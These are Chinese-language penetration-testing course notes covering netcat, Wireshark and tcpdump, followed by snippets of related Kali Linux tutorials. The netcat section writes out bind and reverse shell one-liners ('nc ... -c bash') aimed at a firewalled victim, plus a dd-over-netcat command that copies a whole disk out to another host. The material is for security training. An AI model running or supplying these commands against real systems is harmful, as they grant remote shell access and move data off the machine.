基本⼯具
netcat ——nc
• 偵聽模式 / 傳輸模式
• telnet / 獲取banner資訊
• 傳輸⽂本資訊
• 傳輸⽂件/⺫錄
• 加密傳輸⽂件
• 遠端控制/⽊⻢
• 加密所有流量
• 流**伺服器
• 遠端轉殖硬碟
nc——telnet / banner
• nc –nv 192.168.1.10 110
• nc –nv 192.168.1.11
• nc –nv 192.168.1.10
nc——傳輸⽂本資訊
• a:nc -l -p 4444
• b:nc –nv 192.168.1.10 4444
• a:nc -l -p 4444
• b:ls -l | nc –nv 192.168.1.10 4444
nc——傳輸⽂件/目錄
• 傳輸⽂件
• a:nc -lp 333 > 1.mp4
• b:nc -nv 192.168.1.10 333 < 1.mp4 –q 1
• 或 • a:nc -q 1 -lp 333 < a.mp4
• b: nc -nv 192.168.1.10 333 > 2.mp4
• 傳輸目錄
• a:tar -cvf - music/ | nc -lp 333 –q 1
• b:nc -nv 1.1.1.1 333 | tar -xvf –
• 加密傳⽂件
• a:nc -lp 333 | mcrypt --flush -fbqd -a rijndael-256 -m ecb > 1.mp4
• b: mcrypt --flush -fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 192.168.1.10 333 -q 1
nc——端⼝掃瞄
• nc –vnzu 192.168.1.10 1-1024
nc——遠端轉殖硬碟
• a: nc -lp 333 | dd of=/dev/sda
• b: dd if=/dev/sda | nc -nv 192.168.1.10 333 –q 1
• 遠端電⼦取證,可以將⺫標伺服器硬碟遠端複製,或者記憶體。
nc——遠端控制
• 正向:
• a:nc -lp 333 -c bash
• b:nc - vn 192.168.1.10 333
• 反向:
• a:nc -lp 333
• b:nc -vn 192.168.1.10 333 -c bash
用於被攻擊者埠存在防火牆保護,開放自身埠,然後通過被攻擊者埠掃瞄獲取連線
• nc缺乏加密和⾝份驗證的能⼒
wireshark
• 抓包嗅探協議分析
• 安全專家必備的技能
• 抓包引擎
• libpcap9—— linux
• winpcap10—— windows
• 解碼能⼒
wireshark——基本使⽤⽅法
• 啟動
• 選擇抓包網絡卡
• 混雜模式
• 實時抓包
• 儲存和分析捕獲⽂件
• ⾸選項
wireshark——篩選器
• 過濾掉干擾的資料報
• 抓包篩選器
• 顯⽰篩選器
wireshark——常⻅協議包
• 資料報的分層結構
• arp
• icmp
• tcp——三次握⼿
• 資料流
wireshark——資訊統計
• 節點數
• 協議分布
• 包⼤⼩分布
• 會話連線
• 解碼⽅式
• 專家系統
• 抓包對⽐nc、ncat加密與不加密的流量
tcpdump
• no-gui的抓包分析⼯具
• linux、unix系統預設安裝
tcpdump——抓包
• 抓包
• tcpdump -i eth0 -s 0 -w file.pcap
• 讀取抓包⽂件
• tcpdump -r file.pcap
tcpdump——篩選
• tcpdump -n src host 145.254.160.237 -r http.cap 篩選源ip為145.254.160.237
• tcpdump -n dst host 145.254.160.237 -r http.cap 篩選源ip為145.254.160.237
• tcpdump -n port 53 -r http.cap 篩選埠號
• tcpdump -nx port 80 -r http.cap 篩選埠號
tcpdump——⾼級篩選
• tcpdump -a -n 'tcp[13] = 24' -r http.cap 位元組篩選,13號位元組為24
注釋:本筆記依據《安全牛 苑房弘kali滲透測試課程》學習整理實驗
kali linux滲透測試之Nessus的安裝
0x01 kali uname命令詳解 0x02 etc init.d nessusd start我們在這裡補充一下檢視系統架構型別的命令 uname a命令可以直接顯示 linux 系統架構的命令,幾乎可以工作在所有 linux unix 系統當中。dpkg 的命令可用於檢視 debian ubu...
Kali linux滲透測試系列 目錄大綱
1 kali linux滲透測試環境搭建之kali linux環境搭建 2 kali linux滲透測試環境搭建之kali linux中vmtools的安裝 3 kali linux滲透測試環境搭建之kali linux基本配置 4 kali linux滲透測試簡介之kali linux滲透測試簡介...
001 Kali Linux滲透測試介紹
分層思想 優點 分工明確,工作效率高 缺點 從業人員對系統沒有整體的認識,對安全知識較為片面 安全的目標 先於攻擊者發現和防止漏洞出現 攻擊型 以攻擊者的思維發現漏洞,攻擊系統 防護型 投入巨大,會有遺漏,不夠全面,收效不高 滲透測試 嘗試破解系統的防禦機制,發現系統的弱點 從攻擊者的角度思考,測量...